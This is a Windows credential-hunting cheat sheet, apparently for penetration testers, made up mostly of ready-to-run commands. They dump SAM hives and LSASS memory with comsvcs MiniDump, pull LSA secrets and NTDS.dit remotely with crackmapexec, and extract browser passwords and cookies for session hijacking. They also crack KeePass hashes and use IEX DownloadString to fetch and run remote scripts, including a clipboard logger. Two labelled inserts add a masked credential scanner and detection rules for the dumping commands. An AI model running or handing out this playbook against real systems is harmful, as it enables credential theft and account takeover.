Cred Hunting
The first part is a big bunch of commands for cmd and PowerShell. Want more detailed info? Use AI. The second big part is just a lot of different techniques and tools. Happy Hunting)
CMD
# Search file
C:\> findstr /s /i flag n:\*.*
C:\> dir n:\*flag* /s
# Search for Strings within Files
C:\> findstr /si password *.xml *.ini *.txt *.config
C:\> findstr /spin "password" *.*
C:\> cd c:\Users\rio\Documents & findstr /SI /M "password" *.xml *.ini *.txt
C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
# Search for File Extensions
C:\> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
C:\> where /R C:\ *.config
POWERSHELL
# Searching for Files (by Name or Pattern)
PS C:\> Get-ChildItem -Recurse -Path N:\ -Include *flag* -File
PS C:\> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
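The findstr and Get-ChildItem one-liners above are what a defender runs too, just with a different goal: finding the credentials before someone else does. The script below is an added example (not from the original page) that turns that search into an auditable scan: it walks a tree, opens only config-like files, and reports file, line, key name and a masked value for every password-style assignment. The extension list, the regex and the sample files it builds are assumptions constructed for the demonstration.

```python
"""Defender-side credential-hygiene scan (added example, not from the original page).

Same idea as the findstr / Get-ChildItem one-liners: walk a tree, open only
config-like files, and report file, line, key and a masked value for every
password-style assignment.  The extensions, regex and sample files below are
assumptions built for this demonstration, not a vendor rule set.
"""
import os
import re
import tempfile
from pathlib import Path

# File types the one-liners on this page target; binaries are skipped on purpose.
INTERESTING_EXT = {".xml", ".ini", ".txt", ".config", ".cfg", ".ps1", ".yml", ".yaml"}

# Matches  password=x / Password="x" / "password": "x" / <password>x</password>
# and the same for a few common synonyms.  Group 1 = key, group 2 = value.
CRED_RE = re.compile(
    r"(?i)\b(password|passwd|pwd|secret|api[_-]?key)\b[\"']?\s*(?:[=:]|>)\s*[\"']?([^\"'<\s]+)"
)


def mask(value: str) -> str:
    """Keep the first two characters so a hit is recognisable, hide the rest."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def scan_file(path: Path) -> list[tuple[str, int, str, str]]:
    """Return (path, line number, key, masked value) for each hit in one file."""
    hits = []
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        return hits  # unreadable or locked file: skip it, don't abort the scan
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = CRED_RE.search(line)
        if m:
            hits.append((str(path), lineno, m.group(1), mask(m.group(2))))
    return hits


def scan_tree(root: Path, exts=INTERESTING_EXT) -> list[tuple[str, int, str, str]]:
    """Walk root, scan files whose extension is in exts, return sorted hits."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix.lower() in exts:
                hits.extend(scan_file(p))
    return sorted(hits)


def build_sample_tree() -> Path:
    """Constructed sample data: a web.config with an embedded SQL password, a
    deployment script with a hard-coded password, and two files that must not hit."""
    root = Path(tempfile.mkdtemp(prefix="credscan_"))
    (root / "app").mkdir()
    (root / "app" / "web.config").write_text(
        "<connectionStrings>\n"
        '  <add name="db" connectionString="Server=sql01;User Id=app;Password=Winter2024!" />\n'
        "</connectionStrings>\n"
    )
    (root / "deploy.ps1").write_text('$user = "svc_deploy"\n$Password = "hunter2"\n')
    (root / "notes.txt").write_text("meeting at 3pm\nno secrets here\n")
    (root / "vendor.dll").write_bytes(b"password=not-scanned")  # extension not in the list
    return root


if __name__ == "__main__":
    for path, lineno, key, masked in scan_tree(build_sample_tree()):
        print(f"{path}:{lineno}: {key} = {masked}")
```

Run it against a real share or profile directory by passing that path to scan_tree; the masking keeps the report safe to file as a ticket, since the point of the scan is to get the value moved into a vault, not to copy it somewhere else.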
# Searching for strings within files
PS C:\> Get-ChildItem -Recurse -Path C:\ | Select-String "flag" -List
PS C:\> Select-String -Path C:\Users\rio\Documents\*.txt -Pattern password
Powershell History File
PS C:\> (Get-PSReadLineOption).HistorySavePath
PS C:\> gc (Get-PSReadLineOption).HistorySavePath
PS C:\> Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
Powershell Credentials
They are often used for automation and scripting, and are usually protected with DPAPI. But if we have gained command execution in the context of this user, or can abuse DPAPI, we can recover the cleartext credentials from the encrypted XML file.
PS C:\> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
PS C:\> $credential.GetNetworkCredential().password
SAM Registry Hives Copy
If we have local admin access on the target, we can copy three registry hives, which will let us dump and crack the hashes:
HKLM\sam
Hashes of the local account passwords
HKLM\system
System bootkey, the encryption/decryption key for the SAM
HKLM\security
Cached credentials for domain accounts; not strictly required, but very helpful
To save the hives we use reg.exe as admin (repeat for hklm\system and hklm\security, since secretsdump.py below expects system.save and security.save):
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
Running secretsdump.py
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Remote Dumping
Dumping LSA Secrets Remotely
crackmapexec smb 13.13.13.13 --local-auth -u rio -p rio@123 --lsa
Dumping SAM Remotely
crackmapexec smb 13.13.13.13 --local-auth -u rio -p rio@123 --sam
Dumping NTDS.dit Remotely
crackmapexec smb 13.13.13.13 -u rio -p rio@123 --ntds
LSASS Dumping
Rundll32.exe & Comsvcs.dll Method
IMPORTANT: Antivirus will see this as malicious activity. The idea of the method is to use rundll32.exe to call the exported MiniDump function of comsvcs.dll, which in turn calls MiniDumpWriteDump to write the LSASS process memory to a specified path (C:\lsass.dmp). To do this we need the LSASS PID: get it with tasklist /svc in cmd or Get-Process lsass in PowerShell. With the PID we can dump LSASS memory (666 below is an example PID).
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 666 C:\lsass.dmp full
Shadow Copy of C:
PS C:\> vssadmin CREATE SHADOW /For=C:
NTDS.dit
crackmapexec smb 13.13.13.13 -u rio -p rio@123 --ntds
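Every local dumping command in the sections above (reg save of the SAM/SYSTEM/SECURITY hives, rundll32 calling comsvcs.dll MiniDump against LSASS, vssadmin shadow creation to reach NTDS.dit) leaves a process-creation record, which is exactly where a SOC catches them. The script below is an added example (not from the original page) of that detection logic, run over constructed records shaped like a Sysmon Event ID 1 or Security 4688 export; the field names and the sample events are assumptions for the demonstration.

```python
"""Detection logic for the dumping commands documented above (added example,
not from the original page).  Runs over constructed process-creation records
(timestamp, user, image, command line) and flags: reg save of a credential
hive, rundll32 + comsvcs.dll MiniDump against LSASS, and vssadmin shadow
creation.  Field names and sample records are assumptions for this demo.
"""
import re

# (rule name, regex over the command line).  Case-insensitive, tolerant of the
# .exe suffix and spacing; the MiniDump rule also catches the export called by
# ordinal (#24), the usual attempt to dodge a plain "MiniDump" string match.
RULES = [
    ("reg save of credential hive (SAM/SYSTEM/SECURITY)",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    ("comsvcs.dll MiniDump (LSASS memory dump)",
     re.compile(r"rundll32(?:\.exe)?\b.*comsvcs\.dll\s*,?\s*(?:#?24\b|minidump)", re.I)),
    ("vssadmin shadow copy creation (NTDS.dit / hive access)",
     re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)),
]

# Constructed sample: the page's three commands plus two benign look-alikes.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:12:03Z", "user": "ARASAKA\\rio",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe save hklm\sam C:\sam.save"},
    {"ts": "2024-05-01T10:12:40Z", "user": "ARASAKA\\rio",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 666 C:\lsass.dmp full"},
    {"ts": "2024-05-01T10:13:15Z", "user": "ARASAKA\\rio",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin CREATE SHADOW /For=C:"},
    {"ts": "2024-05-01T10:14:00Z", "user": "ARASAKA\\rio",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},  # benign rundll32
    {"ts": "2024-05-01T10:14:30Z", "user": "ARASAKA\\rio",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"},  # benign reg
]


def classify(cmdline: str) -> list[str]:
    """Names of every rule the command line matches (empty list = nothing suspicious)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def detect(events: list[dict]) -> list[dict]:
    """One alert per (event, matched rule), in the order the events arrived."""
    alerts = []
    for ev in events:
        for rule in classify(ev["cmdline"]):
            alerts.append({"ts": ev["ts"], "user": ev["user"],
                           "rule": rule, "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['ts']} {a['user']} ALERT {a['rule']}: {a['cmdline']}")
```

The three rules are deliberately narrow so they stay quiet on everyday rundll32 and reg activity; command-line matching of this kind is a first tripwire, and LSASS access auditing (Sysmon Event ID 10 on lsass.exe) is the usual companion signal for the MiniDump case.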
Cmdkey Saved Credentials
cmdkey can be used to create, list, and delete stored usernames and passwords. Credentials stored for Remote Desktop (RDP) or other remote hosts can be exploited.
Listing Saved Credentials:
C:\> cmdkey /list
Saved credentials will be used when connecting via RDP.
They can be exploited using runas:
PS C:\> runas /savecred /user:rio\rio "COMMAND HERE"
Browser Credentials
Retrieving Saved Credentials from Chrome
Using SharpChrome [LINK] to extract saved passwords:
PS C:\> .\SharpChrome.exe logins /unprotect
Chrome credential storage can be found at:
AES state key:
C:\Users\rio\AppData\Local\Google\Chrome\User Data\Local State
Login data:
C:\Users\rio\AppData\Local\Google\Chrome\User Data\Default\Login Data
Credentials can be extracted and reused.
Password Managers
Targets include KeePass, 1Password, Thycotic, and CyberArk.
KeePass database (.kdbx) files can be extracted and cracked.
Extracting KeePass Hash:
python2.7 keepass2john.py ARASAKA_Help_Desk.kdbx
Cracking KeePass Hash with Hashcat:
hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt
MailSniper [LINK] can be used to search domain-joined email accounts for passwords.
LaZagne
LaZagne [LINK] is a versatile tool that retrieves credentials from browsers, chat clients, databases, sysadmin tools, etc.
Run all modules:
PS C:\> .\lazagne.exe all
SessionGopher
Extracting Remote Access Credentials
Extracts saved PuTTY, WinSCP, FileZilla, and RDP credentials.
Running SessionGopher [LINK]
PS C:\> Import-Module .\SessionGopher.ps1
PS C:\> Invoke-SessionGopher -Target ARASAKA-SRV1
Windows Registry
Windows AutoLogon
Stored in:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Retrieve:
PS C:\> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
PuTTY Saved Credentials
Stored in:
HKEY_CURRENT_USER\SOFTWARE\VTheMerc\PuTTY\Sessions
Retrieve:
PS C:\> reg query HKEY_CURRENT_USER\SOFTWARE\VTheMerc\PuTTY\Sessions
WiFi Passwords
Listing Saved Wireless Networks:
C:\> netsh wlan show profile
Retrieving Saved Wireless Passwords:
C:\> netsh wlan show profile arasaka_corp key=clear
COOKIES
Firefox
Copy Firefox Cookies Database
PS C:\> copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
Extract cookies from database
For this we'll be using cookieextractor.py script [LINK]
python3 cookieextractor.py --dbpath "/home/rio/cookies.sqlite" --host slack --cookie d
After this we can use the Cookie Editor browser extension to paste the stolen cookie into our session.
Chrome
Chromium-based browsers also use SQLite databases, but usually encrypt them with DPAPI, which encrypts data using information from the current user account or computer. To get the cookie value we need to decrypt it from within the compromised user's session. The SharpChromium script [LINK] will help us with this.
Invoke-SharpChromium
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\> Invoke-SharpChromium -Command "cookies slack.com"
CLIPBOARD
For this we are using Invoke-ClipboardLogger script [LINK]
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
PS C:\> Invoke-ClipboardLogger
INTERESTING FILES
unattend.xml
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*